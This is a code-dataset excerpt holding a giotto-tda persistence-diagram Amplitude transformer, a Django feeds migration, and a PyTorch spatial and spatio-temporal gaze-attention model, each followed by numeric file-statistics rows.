           a norm of :math:`\\mathbf{a}`.

    Parameters
    ----------
    metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \
        ``'betti'`` | ``'heat'``, optional, default: ``'landscape'``
        Distance or dissimilarity function used to define the amplitude of
        a subdiagram as its distance from the diagonal diagram:

        - ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named
          perfect-matching--based notions of distance.
        - ``'landscape'`` refers to the :math:`L^p` distance between
          persistence landscapes.
        - ``'betti'`` refers to the :math:`L^p` distance between Betti curves.
        - ``'heat'`` refers to the :math:`L^p` distance between
          Gaussian-smoothed diagrams.

    metric_params : dict or None, optional, default: ``None``
        Additional keyword arguments for the metric function:

        - If ``metric == 'bottleneck'`` there are no available arguments.
        - If ``metric == 'wasserstein'`` the only argument is `p` (int,
          default: ``2``).
        - If ``metric == 'betti'`` the available arguments are `p` (float,
          default: ``2.``) and `n_values` (int, default: ``100``).
        - If ``metric == 'landscape'`` the available arguments are `p`
          (float, default: ``2.``), `n_values` (int, default: ``100``) and
          `n_layers` (int, default: ``1``).
        - If ``metric == 'heat'`` the available arguments are `p` (float,
          default: ``2.``), `sigma` (float, default: ``1.``) and `n_values`
          (int, default: ``100``).

    order : float or None, optional, default: ``2.``
        If ``None``, :meth:`transform` returns for each diagram a vector of
        amplitudes corresponding to the dimensions in
        :attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of
        these vectors with :math:`p` equal to `order` is taken.

    n_jobs : int or None, optional, default: ``None``
        The number of jobs to use for the computation. ``None`` means 1 unless
        in a :obj:`joblib.parallel_backend` context. ``-1`` means using all
        processors.

    Attributes
    ----------
    effective_metric_params_ : dict
        Dictionary containing all information present in `metric_params` as
        well as on any relevant quantities computed in :meth:`fit`.

    homology_dimensions_ : list
        Homology dimensions seen in :meth:`fit`, sorted in ascending order.

    See also
    --------
    PairwiseDistance, Scaler, Filtering, \
    BettiCurve, PersistenceLandscape, \
    HeatKernel, giotto.homology.VietorisRipsPersistence

    Notes
    -----
    To compute amplitudes without first splitting the computation between
    different homology dimensions, data should be first transformed by an
    instance of :class:`ForgetDimension`.
    """
    # Only `order` is validated through `validate_params`; `metric` and
    # `metric_params` are checked separately by `validate_metric_params`.
    _hyperparameters = {'order': [float, (1, np.inf)]}
    def __init__(self, metric='landscape', metric_params=None, order=2.,
                 n_jobs=None):
        self.metric = metric
        self.metric_params = metric_params
        self.order = order
        self.n_jobs = n_jobs
    def fit(self, X, y=None):
        """Store all observed homology dimensions in
        :attr:`homology_dimensions_` and compute
        :attr:`effective_metric_params_`. Then, return the estimator.

        This method is there to implement the usual scikit-learn API and hence
        work in pipelines.

        Parameters
        ----------
        X : ndarray, shape (n_samples, n_features, 3)
            Input data. Array of persistence diagrams, each a collection of
            triples [b, d, q] representing persistent topological features
            through their birth (b), death (d) and homology dimension (q).

        y : None
            There is no need for a target in a transformer, yet the pipeline
            API requires this parameter.

        Returns
        -------
        self : object
        """
        # Work on a copy so user-supplied metric_params is never mutated.
        if self.metric_params is None:
            self.effective_metric_params_ = {}
        else:
            self.effective_metric_params_ = self.metric_params.copy()
        hyperparameters = self.get_params().copy()
        if self.order is not None:
            if isinstance(self.order, int):
                hyperparameters['order'] = float(self.order)
        else:
            hyperparameters['order'] = 1.  # Automatically pass validate_params
        validate_params(hyperparameters, self._hyperparameters)
        validate_metric_params(self.metric, self.effective_metric_params_)
        X = check_diagram(X)
        # Dimensions are read off the first diagram's third column.
        self.homology_dimensions_ = sorted(set(X[0, :, 2]))
        # Sampling-based metrics need discretization parameters up front.
        if self.metric in ['landscape', 'heat', 'betti']:
            self.effective_metric_params_['samplings'], \
                self.effective_metric_params_['step_sizes'] = \
                _discretize(X, **self.effective_metric_params_)
        return self
    def transform(self, X, y=None):
        """Compute the amplitudes or amplitude vectors of diagrams in `X`.

        Parameters
        ----------
        X : ndarray, shape (n_samples, n_features, 3)
            Input data. Array of persistence diagrams, each a collection of
            triples [b, d, q] representing persistent topological features
            through their birth (b), death (d) and homology dimension (q).

        y : None
            There is no need for a target in a transformer, yet the pipeline
            API requires this parameter.

        Returns
        -------
        Xt : ndarray, shape (n_samples, n_homology_dimensions) if `order` \
            is ``None``, else (n_samples, 1)
            Amplitudes or amplitude vectors of the diagrams in `X`. In the
            second case, index i along axis 1 corresponds to the i-th
            homology dimension in :attr:`homology_dimensions_`.
        """
        check_is_fitted(self, ['effective_metric_params_',
                               'homology_dimensions_'])
        X = check_diagram(X)
        Xt = _parallel_amplitude(X, self.metric,
                                 self.effective_metric_params_,
                                 self.homology_dimensions_,
                                 self.n_jobs)
        # With no order requested, return the per-dimension vectors as-is.
        if self.order is None:
            return Xt
        # Otherwise collapse each vector to a scalar, keeping 2D shape.
        Xt = np.linalg.norm(Xt, axis=1, ord=self.order).reshape(-1, 1)
        return Xt
| 41.634921
| 79
| 0.6206
| 1,851
| 15,738
| 5.162615
| 0.161534
| 0.048974
| 0.043951
| 0.041859
| 0.801486
| 0.769883
| 0.746756
| 0.746756
| 0.73378
| 0.714734
| 0
| 0.007004
| 0.274241
| 15,738
| 377
| 80
| 41.745358
| 0.829627
| 0.665205
| 0
| 0.802198
| 0
| 0
| 0.050934
| 0.011642
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065934
| false
| 0
| 0.065934
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
962df033e393c78b064fe61a77a627df4a29e5f8
| 1,821
|
py
|
Python
|
rsscraper/feeds/migrations/0002_auto_20200104_0011.py
|
Sunno/rsscraper
|
a9897d507980ec4525e8521188cf76203829caca
|
[
"MIT"
] | null | null | null |
rsscraper/feeds/migrations/0002_auto_20200104_0011.py
|
Sunno/rsscraper
|
a9897d507980ec4525e8521188cf76203829caca
|
[
"MIT"
] | null | null | null |
rsscraper/feeds/migrations/0002_auto_20200104_0011.py
|
Sunno/rsscraper
|
a9897d507980ec4525e8521188cf76203829caca
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.9 on 2020-01-04 04:11
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the feeds app (2020-01-04).

    Drops the ``favorite`` flag from ``Feed`` and re-adds it on
    ``FeedItem``, and adds fetch/update timestamps and text metadata
    fields to both models.
    """
    dependencies = [
        ('feeds', '0001_initial'),
    ]
    operations = [
        # `favorite` moves from Feed to FeedItem (added again below).
        migrations.RemoveField(
            model_name='feed',
            name='favorite',
        ),
        migrations.AddField(
            model_name='feed',
            name='last_fetch',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='feed',
            name='last_updated',
            field=models.DateTimeField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='feed',
            name='title',
            field=models.CharField(blank=True, default='', max_length=256),
        ),
        migrations.AddField(
            model_name='feeditem',
            name='author',
            field=models.CharField(blank=True, default='', max_length=256),
        ),
        migrations.AddField(
            model_name='feeditem',
            name='content',
            field=models.TextField(blank=True, default=''),
        ),
        migrations.AddField(
            model_name='feeditem',
            name='favorite',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='feeditem',
            name='read',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='feeditem',
            name='summary',
            field=models.TextField(blank=True, default=''),
        ),
        migrations.AddField(
            model_name='feeditem',
            name='title',
            field=models.CharField(blank=True, default='', max_length=256),
        ),
    ]
| 28.904762
| 75
| 0.532674
| 162
| 1,821
| 5.888889
| 0.308642
| 0.09434
| 0.216981
| 0.254717
| 0.759958
| 0.759958
| 0.759958
| 0.714885
| 0.714885
| 0.714885
| 0
| 0.023333
| 0.341021
| 1,821
| 62
| 76
| 29.370968
| 0.771667
| 0.024712
| 0
| 0.75
| 1
| 0
| 0.086246
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017857
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
96bcbd75ea7e93a269f880a91d9722c065ddd1a9
| 19,319
|
py
|
Python
|
model.py
|
ejcgt/attention-target-detection
|
acd264a3c9e6002b71244dea8c1873e5c5818500
|
[
"MIT"
] | 101
|
2020-03-05T06:47:05.000Z
|
2022-03-31T03:42:51.000Z
|
model.py
|
ejcgt/attention-target-detection
|
acd264a3c9e6002b71244dea8c1873e5c5818500
|
[
"MIT"
] | 12
|
2020-03-12T11:10:57.000Z
|
2022-01-14T03:58:03.000Z
|
model.py
|
ejcgt/attention-target-detection
|
acd264a3c9e6002b71244dea8c1873e5c5818500
|
[
"MIT"
] | 31
|
2020-06-17T22:00:13.000Z
|
2022-01-20T06:18:20.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils.rnn import pack_padded_sequence, PackedSequence
import math
from lib.pytorch_convolutional_rnn import convolutional_rnn
import numpy as np
class Bottleneck(nn.Module):
    """Standard ResNet bottleneck block: 1x1 reduce, 3x3, 1x1 expand
    (by ``expansion``), with an optional projection shortcut."""
    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(Bottleneck, self).__init__()
        # Module creation order mirrors the reference implementation so
        # seeded parameter initialization stays reproducible.
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
                               padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(planes * 4)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        # Main path: 1x1 -> 3x3 -> 1x1, BN after each conv.
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        # Shortcut path, projected only when a downsample module exists.
        shortcut = x if self.downsample is None else self.downsample(x)
        return self.relu(out + shortcut)
class BottleneckConvLSTM(nn.Module):
    """Bottleneck block variant that skips every BatchNorm layer when the
    incoming batch contains a single sample (the original "RW edit"
    batch_size==1 guards), and applies an extra BatchNorm (``bn_ds``)
    after the downsample projection for multi-sample batches."""
    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BottleneckConvLSTM, self).__init__()
        # Module creation order mirrors the reference implementation so
        # seeded parameter initialization stays reproducible.
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
                               padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(planes * 4)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.bn_ds = nn.BatchNorm2d(planes * self.expansion)
        self.stride = stride

    def forward(self, x):
        def maybe_norm(bn, t):
            # Skip BatchNorm for batches of size one.
            return bn(t) if t.shape[0] > 1 else t

        out = self.relu(maybe_norm(self.bn1, self.conv1(x)))
        out = self.relu(maybe_norm(self.bn2, self.conv2(out)))
        out = maybe_norm(self.bn3, self.conv3(out))
        if self.downsample is None:
            shortcut = x
        elif out.shape[0] > 1:
            # Projection shortcut followed by its own BatchNorm.
            shortcut = self.bn_ds(self.downsample(x))
        else:
            shortcut = self.downsample(x)
        return self.relu(out + shortcut)
class ModelSpatial(nn.Module):
    """Two-pathway gaze-following network built on a ResNet-50-ish backbone.

    One pathway encodes the scene image (plus a head-position channel), the
    other encodes the cropped head image. An attention map derived from the
    head pathway modulates the scene features, which are then decoded into a
    gaze heatmap plus an in/out-of-frame score.
    """
    # Define a ResNet 50-ish arch
    # NOTE(review): the mutable list defaults below are shared across
    # instances; harmless here because they are only read, but tuples would
    # be safer.
    def __init__(self, block = Bottleneck, layers_scene = [3, 4, 6, 3, 2], layers_face = [3, 4, 6, 3, 2]):
        """Assemble both pathways, the attention head, encoders and decoder.

        Args:
            block: residual block class used for every layer (expects the
                `expansion = 4` bottleneck interface).
            layers_scene: block counts for the five scene-pathway layers.
            layers_face: block counts for the five face-pathway layers.
        """
        # Resnet Feature Extractor
        # Running channel counters consumed/updated by _make_layer_*.
        self.inplanes_scene = 64
        self.inplanes_face = 64
        super(ModelSpatial, self).__init__()
        # common
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.avgpool = nn.AvgPool2d(7, stride=1)
        # scene pathway: 4 input channels (image concatenated with the
        # single-channel head-position map in forward()).
        self.conv1_scene = nn.Conv2d(4, 64, kernel_size=7, stride=2, padding=3, bias=False)
        self.bn1_scene = nn.BatchNorm2d(64)
        self.layer1_scene = self._make_layer_scene(block, 64, layers_scene[0])
        self.layer2_scene = self._make_layer_scene(block, 128, layers_scene[1], stride=2)
        self.layer3_scene = self._make_layer_scene(block, 256, layers_scene[2], stride=2)
        self.layer4_scene = self._make_layer_scene(block, 512, layers_scene[3], stride=2)
        self.layer5_scene = self._make_layer_scene(block, 256, layers_scene[4], stride=1)  # additional to resnet50
        # face pathway: plain 3-channel crop of the head.
        self.conv1_face = nn.Conv2d(3, 64, kernel_size = 7, stride = 2, padding = 3, bias = False)
        self.bn1_face = nn.BatchNorm2d(64)
        self.layer1_face = self._make_layer_face(block, 64, layers_face[0])
        self.layer2_face = self._make_layer_face(block, 128, layers_face[1], stride=2)
        self.layer3_face = self._make_layer_face(block, 256, layers_face[2], stride=2)
        self.layer4_face = self._make_layer_face(block, 512, layers_face[3], stride=2)
        self.layer5_face = self._make_layer_face(block, 256, layers_face[4], stride=1)  # additional to resnet50
        # attention: input is 784 (28*28 pooled head map) + 1024 (pooled face
        # features) = 1808; output is a flat 7x7 attention map.
        self.attn = nn.Linear(1808, 1*7*7)
        # encoding for saliency
        self.compress_conv1 = nn.Conv2d(2048, 1024, kernel_size=1, stride=1, padding=0, bias=False)
        self.compress_bn1 = nn.BatchNorm2d(1024)
        self.compress_conv2 = nn.Conv2d(1024, 512, kernel_size=1, stride=1, padding=0, bias=False)
        self.compress_bn2 = nn.BatchNorm2d(512)
        # encoding for in/out
        self.compress_conv1_inout = nn.Conv2d(2048, 512, kernel_size=1, stride=1, padding=0, bias=False)
        self.compress_bn1_inout = nn.BatchNorm2d(512)
        self.compress_conv2_inout = nn.Conv2d(512, 1, kernel_size=1, stride=1, padding=0, bias=False)
        self.compress_bn2_inout = nn.BatchNorm2d(1)
        self.fc_inout = nn.Linear(49, 1)
        # decoding: three transposed convs upsample the 7x7 encoding.
        self.deconv1 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2)
        self.deconv_bn1 = nn.BatchNorm2d(256)
        self.deconv2 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2)
        self.deconv_bn2 = nn.BatchNorm2d(128)
        self.deconv3 = nn.ConvTranspose2d(128, 1, kernel_size=4, stride=2)
        self.deconv_bn3 = nn.BatchNorm2d(1)
        self.conv4 = nn.Conv2d(1, 1, kernel_size=1, stride=1)
        # Initialize weights: He-style normal init for convs, unit
        # scale / zero shift for BatchNorm.
        for m in self.modules():
            if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()

    def _make_layer_scene(self, block, planes, blocks, stride=1):
        """Standard ResNet layer builder for the scene pathway.

        Creates `blocks` residual blocks; the first carries the stride and a
        1x1-conv downsample when the shape changes. Updates
        `self.inplanes_scene` as a side effect.
        """
        downsample = None
        if stride != 1 or self.inplanes_scene != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes_scene, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes_scene, planes, stride, downsample))
        self.inplanes_scene = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes_scene, planes))
        return nn.Sequential(*layers)

    def _make_layer_face(self, block, planes, blocks, stride=1):
        """Same as _make_layer_scene but tracks `self.inplanes_face`."""
        downsample = None
        if stride != 1 or self.inplanes_face != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes_face, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes_face, planes, stride, downsample))
        self.inplanes_face = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes_face, planes))
        return nn.Sequential(*layers)

    def forward(self, images, head, face):
        """Run both pathways and fuse them through attention.

        Args:
            images: scene frames; concatenated with `head` before a 4-channel
                conv, so presumably 3-channel RGB — TODO confirm with callers.
            head: single-channel head-position map; the pooling below expects
                224x224 input (3x maxpool -> 28x28 -> flattened 784).
            face: 3-channel head crop for the face pathway.

        Returns:
            (heatmap logits, mean attention map, in/out score) tuple.
        """
        face = self.conv1_face(face)
        face = self.bn1_face(face)
        face = self.relu(face)
        face = self.maxpool(face)
        face = self.layer1_face(face)
        face = self.layer2_face(face)
        face = self.layer3_face(face)
        face = self.layer4_face(face)
        face_feat = self.layer5_face(face)
        # reduce head channel size by max pooling: (N, 1, 224, 224) -> (N, 1, 28, 28)
        head_reduced = self.maxpool(self.maxpool(self.maxpool(head))).view(-1, 784)
        # reduce face feature size by avg pooling: (N, 1024, 7, 7) -> (N, 1024, 1, 1)
        face_feat_reduced = self.avgpool(face_feat).view(-1, 1024)
        # get and reshape attention weights such that it can be multiplied with scene feature map
        attn_weights = self.attn(torch.cat((head_reduced, face_feat_reduced), 1))
        attn_weights = attn_weights.view(-1, 1, 49)
        attn_weights = F.softmax(attn_weights, dim=2)  # soft attention weights single-channel
        attn_weights = attn_weights.view(-1, 1, 7, 7)
        # Scene pathway consumes image + head-position map as a 4-channel input.
        im = torch.cat((images, head), dim=1)
        im = self.conv1_scene(im)
        im = self.bn1_scene(im)
        im = self.relu(im)
        im = self.maxpool(im)
        im = self.layer1_scene(im)
        im = self.layer2_scene(im)
        im = self.layer3_scene(im)
        im = self.layer4_scene(im)
        scene_feat = self.layer5_scene(im)
        # attn_weights = torch.ones(attn_weights.shape)/49.0
        attn_applied_scene_feat = torch.mul(attn_weights, scene_feat)  # (N, 1, 7, 7) # applying attention weights on scene feat
        scene_face_feat = torch.cat((attn_applied_scene_feat, face_feat), 1)
        # scene + face feat -> in/out
        encoding_inout = self.compress_conv1_inout(scene_face_feat)
        encoding_inout = self.compress_bn1_inout(encoding_inout)
        encoding_inout = self.relu(encoding_inout)
        encoding_inout = self.compress_conv2_inout(encoding_inout)
        encoding_inout = self.compress_bn2_inout(encoding_inout)
        encoding_inout = self.relu(encoding_inout)
        encoding_inout = encoding_inout.view(-1, 49)
        encoding_inout = self.fc_inout(encoding_inout)
        # scene + face feat -> encoding -> decoding
        encoding = self.compress_conv1(scene_face_feat)
        encoding = self.compress_bn1(encoding)
        encoding = self.relu(encoding)
        encoding = self.compress_conv2(encoding)
        encoding = self.compress_bn2(encoding)
        encoding = self.relu(encoding)
        x = self.deconv1(encoding)
        x = self.deconv_bn1(x)
        x = self.relu(x)
        x = self.deconv2(x)
        x = self.deconv_bn2(x)
        x = self.relu(x)
        x = self.deconv3(x)
        x = self.deconv_bn3(x)
        x = self.relu(x)
        x = self.conv4(x)
        return x, torch.mean(attn_weights, 1, keepdim=True), encoding_inout
class ModelSpatioTemporal(nn.Module):
    """Temporal variant of the two-pathway gaze model.

    Identical scene/face/attention structure to the spatial model, but the
    512-channel encoding is fed through a convolutional LSTM
    (`convolutional_rnn.Conv2dLSTM`) over packed frame sequences before being
    decoded into the gaze heatmap.
    """
    # Define a ResNet 50-ish arch
    # NOTE(review): mutable list defaults are shared across instances;
    # harmless as they are only read, but tuples would be safer.
    def __init__(self, block=BottleneckConvLSTM, num_lstm_layers = 1, bidirectional = False, layers_scene = [3, 4, 6, 3, 2], layers_face = [3, 4, 6, 3, 2]):
        """Assemble both pathways, the attention head, the ConvLSTM and decoder.

        Args:
            block: residual block class (defaults to the batch-size-1-safe
                BottleneckConvLSTM).
            num_lstm_layers: stacked layers in the Conv2dLSTM.
            bidirectional: whether the Conv2dLSTM runs in both directions.
            layers_scene: block counts for the five scene-pathway layers.
            layers_face: block counts for the five face-pathway layers.
        """
        # Resnet Feature Extractor
        # Running channel counters consumed/updated by _make_layer_*.
        self.inplanes_scene = 64
        self.inplanes_face = 64
        super(ModelSpatioTemporal, self).__init__()
        # common
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.avgpool = nn.AvgPool2d(7, stride=1)
        # scene pathway: 4 input channels (image + head-position map).
        self.conv1_scene = nn.Conv2d(4, 64, kernel_size=7, stride=2, padding=3, bias=False)
        self.bn1_scene = nn.BatchNorm2d(64)
        self.layer1_scene = self._make_layer_scene(block, 64, layers_scene[0])
        self.layer2_scene = self._make_layer_scene(block, 128, layers_scene[1], stride=2)
        self.layer3_scene = self._make_layer_scene(block, 256, layers_scene[2], stride=2)
        self.layer4_scene = self._make_layer_scene(block, 512, layers_scene[3], stride=2)
        self.layer5_scene = self._make_layer_scene(block, 256, layers_scene[4], stride=1)  # additional to resnet50
        # face pathway
        self.conv1_face = nn.Conv2d(3, 64, kernel_size = 7, stride = 2, padding = 3, bias = False)
        self.bn1_face = nn.BatchNorm2d(64)
        self.layer1_face = self._make_layer_face(block, 64, layers_face[0])
        self.layer2_face = self._make_layer_face(block, 128, layers_face[1], stride=2)
        self.layer3_face = self._make_layer_face(block, 256, layers_face[2], stride=2)
        self.layer4_face = self._make_layer_face(block, 512, layers_face[3], stride=2)
        self.layer5_face = self._make_layer_face(block, 256, layers_face[4], stride=1)  # additional to resnet50
        # attention: 784 (pooled head map) + 1024 (pooled face feats) = 1808 in.
        self.attn = nn.Linear(1808, 1*7*7)
        # encoding for saliency
        self.compress_conv1 = nn.Conv2d(2048, 1024, kernel_size=1, stride=1, padding=0, bias=False)
        self.compress_bn1 = nn.BatchNorm2d(1024)
        self.compress_conv2 = nn.Conv2d(1024, 512, kernel_size=1, stride=1, padding=0, bias=False)
        self.compress_bn2 = nn.BatchNorm2d(512)
        # encoding for in/out
        self.compress_conv1_inout = nn.Conv2d(2048, 512, kernel_size=1, stride=1, padding=0, bias=False)
        self.compress_bn1_inout = nn.BatchNorm2d(512)
        self.compress_conv2_inout = nn.Conv2d(512, 1, kernel_size=1, stride=1, padding=0, bias=False)
        self.compress_bn2_inout = nn.BatchNorm2d(1)
        self.fc_inout = nn.Linear(49, 1)
        # Convolutional LSTM over the 512-channel spatial encoding
        # (external `convolutional_rnn` package).
        self.convlstm_scene = convolutional_rnn.Conv2dLSTM(in_channels=512,
                                                           out_channels=512,
                                                           kernel_size=3,
                                                           num_layers=num_lstm_layers,
                                                           bidirectional=bidirectional,
                                                           batch_first=True,
                                                           stride=1,
                                                           dropout=0.5)
        self.deconv1 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2)
        self.deconv_bn1 = nn.BatchNorm2d(256)
        self.deconv2 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2)
        self.deconv_bn2 = nn.BatchNorm2d(128)
        self.deconv3 = nn.ConvTranspose2d(128, 1, kernel_size=4, stride=2)
        self.deconv_bn3 = nn.BatchNorm2d(1)
        self.conv4 = nn.Conv2d(1, 1, kernel_size=1, stride=1)
        # Initialize weights: He-style normal for convs, unit/zero for BN.
        for m in self.modules():
            if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()

    def _make_layer_scene(self, block, planes, blocks, stride=1):
        """ResNet layer builder for the scene pathway; mutates inplanes_scene."""
        downsample = None
        if stride != 1 or self.inplanes_scene != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes_scene, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes_scene, planes, stride, downsample))
        self.inplanes_scene = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes_scene, planes))
        return nn.Sequential(*layers)

    def _make_layer_face(self, block, planes, blocks, stride=1):
        """Same as _make_layer_scene but tracks `self.inplanes_face`."""
        downsample = None
        if stride != 1 or self.inplanes_face != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes_face, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes_face, planes, stride, downsample))
        self.inplanes_face = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes_face, planes))
        return nn.Sequential(*layers)

    def forward(self, images, head, face, hidden_scene: tuple = None, batch_sizes: list = None):
        """Run both pathways, the ConvLSTM over packed frames, and decode.

        Args:
            images: scene frames (presumably 3-channel RGB — TODO confirm).
            head: single-channel head-position maps (pooled 224 -> 28 below).
            face: 3-channel head crops.
            hidden_scene: optional (h, c) state carried between calls.
            batch_sizes: PackedSequence batch sizes; assumes the caller has
                already ordered frames as a packed sequence — verify upstream.

        Returns:
            (heatmap logits, in/out scores, new ConvLSTM hidden state).
        """
        face = self.conv1_face(face)
        face = self.bn1_face(face)
        face = self.relu(face)
        face = self.maxpool(face)
        face = self.layer1_face(face)
        face = self.layer2_face(face)
        face = self.layer3_face(face)
        face = self.layer4_face(face)
        face_feat = self.layer5_face(face)
        # reduce head channel size by max pooling: (N, 1, 224, 224) -> (N, 1, 28, 28)
        head_reduced = self.maxpool(self.maxpool(self.maxpool(head))).view(-1, 784)
        # reduce face feature size by avg pooling: (N, 1024, 7, 7) -> (N, 1024, 1, 1)
        face_feat_reduced = self.avgpool(face_feat).view(-1, 1024)
        # get and reshape attention weights such that it can be multiplied with scene feature map
        attn_weights = self.attn(torch.cat((head_reduced, face_feat_reduced), 1))
        attn_weights = attn_weights.view(-1, 1, 49)
        attn_weights = F.softmax(attn_weights, dim=2)  # soft attention weights single-channel
        attn_weights = attn_weights.view(-1, 1, 7, 7)
        im = torch.cat((images, head), dim=1)
        im = self.conv1_scene(im)
        im = self.bn1_scene(im)
        im = self.relu(im)
        im = self.maxpool(im)
        im = self.layer1_scene(im)
        im = self.layer2_scene(im)
        im = self.layer3_scene(im)
        im = self.layer4_scene(im)
        scene_feat = self.layer5_scene(im)
        attn_applied_scene_feat = torch.mul(attn_weights, scene_feat)  # (N, 1, 7, 7) # applying attention weights on scene feat
        scene_face_feat = torch.cat((attn_applied_scene_feat, face_feat), 1)
        # scene + face feat -> in/out
        encoding_inout = self.compress_conv1_inout(scene_face_feat)
        encoding_inout = self.compress_bn1_inout(encoding_inout)
        encoding_inout = self.relu(encoding_inout)
        encoding_inout = self.compress_conv2_inout(encoding_inout)
        encoding_inout = self.compress_bn2_inout(encoding_inout)
        encoding_inout = self.relu(encoding_inout)
        # scene + face feat -> encoding -> decoding
        encoding = self.compress_conv1(scene_face_feat)
        encoding = self.compress_bn1(encoding)
        encoding = self.relu(encoding)
        encoding = self.compress_conv2(encoding)
        encoding = self.compress_bn2(encoding)
        encoding = self.relu(encoding)
        # RW edit: x should be of shape (size, channel, width, height)
        # PackedSequence is built directly from precomputed batch_sizes
        # rather than via pack_padded_sequence — the caller owns the packing.
        x_pad = PackedSequence(encoding, batch_sizes)
        y, hx = self.convlstm_scene(x_pad, hx=hidden_scene)
        deconv = y.data
        inout_val = encoding_inout.view(-1, 49)
        inout_val = self.fc_inout(inout_val)
        # Decoder BatchNorms are skipped for a single-sample batch
        # (same rationale as BottleneckConvLSTM).
        deconv = self.deconv1(deconv)
        if encoding.shape[0] > 1:
            deconv = self.deconv_bn1(deconv)
        deconv = self.relu(deconv)
        deconv = self.deconv2(deconv)
        if encoding.shape[0] > 1:
            deconv = self.deconv_bn2(deconv)
        deconv = self.relu(deconv)
        deconv = self.deconv3(deconv)
        if encoding.shape[0] > 1:
            deconv = self.deconv_bn3(deconv)
        deconv = self.relu(deconv)
        deconv = self.conv4(deconv)
        return deconv, inout_val, hx
| 43.219239
| 156
| 0.618562
| 2,552
| 19,319
| 4.509404
| 0.080329
| 0.032152
| 0.019117
| 0.020681
| 0.904501
| 0.901025
| 0.901025
| 0.88747
| 0.88747
| 0.877303
| 0
| 0.052961
| 0.271857
| 19,319
| 446
| 157
| 43.316144
| 0.765124
| 0.07547
| 0
| 0.832845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035191
| false
| 0
| 0.020528
| 0
| 0.096774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
